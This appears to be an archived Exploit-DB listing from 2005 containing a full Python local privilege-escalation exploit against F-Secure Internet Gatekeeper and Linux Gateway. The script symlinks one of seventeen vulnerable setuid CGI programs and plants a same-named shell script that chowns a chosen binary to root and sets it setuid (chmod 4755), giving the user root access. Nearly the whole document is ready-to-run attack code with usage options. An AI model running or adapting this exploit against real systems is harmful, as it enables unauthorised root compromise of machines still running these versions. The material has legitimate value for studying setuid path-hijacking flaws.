F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation

EDB-ID:

1297


Platform:

Linux

Published:

2005-11-07

#!/usr/bin/env python
#
# F-Secure Anti-Virus Internet Gatekeeper for Linux <2.15.484 
# F-Secure Anti-Virus Linux Gateway <2.16 # added line 3-4 for references /str0ke
#
##############################################################################
##  fsigk_exp.py: F-Secure Internet Gatekeeper for Linux local root exploit
##  acknowledgements: everyone in pure-elite and uDc.
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################

##############################################################################
##  Make proper checks and import nessesary calls from modules.
##

try: 
    from sys import argv
except Exception: 
    print "the 'sys' module could not be loaded"
    raise SystemExit

try: 
    from os import unlink, stat, error, symlink, system, chmod
except Exception:
     print "the 'os' module could not be loaded"
     raise SystemExit

try: 
    import getopt
except Exception: 
    print "the 'getopt' module could not be loaded"
    raise SystemExit

##############################################################################
##  Constants.
##

__program__ = argv[0]
__version__ = "0.1beta"
__author__ = "<xavier@tigerteam.se>"
__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"
__usage__ = """usage: %s [-options]

options:
       --version  show program's version number and exit.
      -h, --help  show this help message and exit.

      -s, --suid  file location to suid.
       -d, --dir  cgi directory.
     -c, --clean  cleans any left over files from the environment creation.
              -#  enter numerical value of vulnerable file to exploit. [list below]

 1: ifconfig_suid.cgi  |  2: reboot_suid.cgi     |  3: proxy_suid.cgi
 4: edittmpl_suid.cgi  |  5: version_suid.cgi    |  6: hostname_suid.cgi
 7: gateway_suid.cgi   |  8: halt_suid.cgi       |  9: edituserdb_suid.cgi
10: htpasswd_suid.cgi  | 11: pattern_up_suid.cgi | 12: license_suid.cgi
13: iptables_suid.cgi  | 14: dns_suid.cgi        | 15: pattern_autoup_suid.cgi
16: spam_list_suid.cgi | 17: diag_suid.cgi""" % (__program__)

#######################################################################################
## Functions.
##

def _write(file, payload):
    try: 
        open(file, 'w').write(payload)
        chmod(file, 0100)
    except Exception, err: 
        print ("[-] %s" % (err))

def _exists(path):
    try: 
        stat(path)
    except error:
        return False
    return True

def _handleopts():
    for opt in argv[1:]:
        if opt in ("-h", "--help"): 
            print "%s" % (__usage__),
            raise SystemExit
        if opt in ("-v", "--version"): 
            print "%s (%s)" % (__version__, __lastedit__),
            raise SystemExit

    _method_ = 'ifconfig_suid.cgi'
    _file_ = 'ifconfig.cgi'
    for opt in argv[1:]:
        if opt == "-1": 
            _method_ = 'ifconfig_suid.cgi'
        elif opt == "-2": 
            _method_ = 'reboot_suid.cgi'
            _file_ = 'reboot.cgi'
        elif opt == "-3": 
            _method_ = 'proxy_suid.cgi'
            _file_ = 'proxy.cgi'
        elif opt == "-4": 
            _method_ = 'edittmpl_suid.cgi'
            _file_ = 'edittmpl.cgi'
        elif opt == "-5": 
            _method_ = 'version_suid.cgi'
            _file_ = 'version.cgi'
        elif opt == "-6": 
            _method_ = 'hostname_suid.cgi'
            _file_ = 'hostname.cgi'
        elif opt == "-7": 
            _method_ = 'gateway_suid.cgi'
            _file_ = 'gateway.cgi'
        elif opt == "-8": 
            _method_ = 'halt_suid.cgi'
            _file_ = 'halt.cgi'
        elif opt == "-9": 
            _method_ = 'edituserdb_suid.cgi'
            _file_ = 'edituserdb.cgi'
        elif opt == "-10": 
            _method_ = 'htpasswd_suid.cgi'
            _file_ = 'htpasswd.cgi'
        elif opt == "-11": 
            _method_ = 'pattern_up_suid.cgi'
            _file_ = 'pattern_up.cgi'
        elif opt == "-12": 
            _method_ = 'license_suid.cgi'
            _file_ = 'license.cgi'
        elif opt == "-13":
            _method_ = 'iptables_suid.cgi'
            _file_ = 'iptables.cgi'
        elif opt == "-14": 
            _method_ = 'dns_suid.cgi'
            _file_ = 'dns.cgi'
        elif opt == "-15": 
            _method_ = 'pattern_autoup_suid.cgi'
            _file_ = 'pattern_autoup.cgi'
        elif opt == "-16": 
            _method_ = 'spam_list_suid.cgi'
            _file_ = 'spam_list.cgi'
        elif opt == "-17": 
            _method_ = 'diag_suid.cgi'
            _file_ = 'diag.cgi'
        else: 
            pass

    try:
        opts = getopt.getopt(argv[1:], 'c1234567890s:d:', ['clean', \
                                                          'suid=', \
                                                          'dir='])[0]
    except Exception, (err):
        print "[-] %s" % (err),
        raise SystemExit

    _dir_ = None
    _payload_ = None
    _combine_ = None

    for o, a in opts:
        if o in ("-c", "--clean"): 
            _clean()
            print "[*] done"
            raise SystemExit
        if o in ("-d", "--dir"): 
            if _exists(a): 
                _dir_ = a
            else: 
                print "[-] unable to access the %s directory" % (_dir_),
                raise SystemExit
        if o in ("-s", "--suid"): 
            if _exists(a): 
                _payload_ = _suid(a)
            else: 
                print "[-] unable to access binary."
                raise SystemExit

    if _dir_ == None: 
        print "[-] no directory was given [try -h for help menu]"
        raise SystemExit
    if _payload_ == None: 
        print "[-] enter binary to suid [try -h for help menu]"
        raise SystemExit
    _combined_ = "%s/%s" % (_dir_, _method_)
    if not _exists(_combined_): 
        print "[-] method not possible, try another."
        raise SystemExit

    print "[*] creating environment..."
    try:
        symlink('%s/%s' % (_dir_, _method_), 'runbad')
        _write(_file_, _payload_)
    except Exception, err:
        raise SystemExit


def _suid(file):
    _suid_ = """#!/bin/sh
chown 0.0 %(file)s
chmod 4755 %(file)s
""" % (locals())
    return _suid_


def _clean():
    try:
        files = ['runbad', 'ifconfig.cgi', 'reboot.cgi', 'proxy.cgi', 
                 'edittmpl.cgi', 'version.cgi', 'hostname.cgi', 'gateway.cgi',
                 'halt.cgi', 'edituserdb.cgi', 'htpasswd.cgi', 'pattern_up.cgi',
                 'license.cgi', 'iptables.cgi', 'dns.cgi', 'pattern_autoup.cgi', 
                 'spam_list.cgi', 'diag_suid.cgi']

        for file in files:
            if _exists(file): unlink(file)

    except Exception, err:
        print "[-] %s" % (err),


##############################################################################
##  main() // main code.
##

def main():
    try:
        print "[INFO] F-Secure Internet Gatekeeper for Linux <=2.10-431 local exploit by %s" % (__author__)
        print "[*] handling options, arguments..."
        _handleopts()
        print "[*] executing exploit..."
        system('./runbad')
        print "[*] cleaning..."
        _clean()
        print "[*] done... try executing the specified binary."
    except KeyboardInterrupt:
        print "[-] caught keyboard interuption"
        raise SystemExit
    except Exception, (err): 
        _clean()
        raise SystemExit

if __name__ == '__main__': main()

# milw0rm.com [2005-11-07]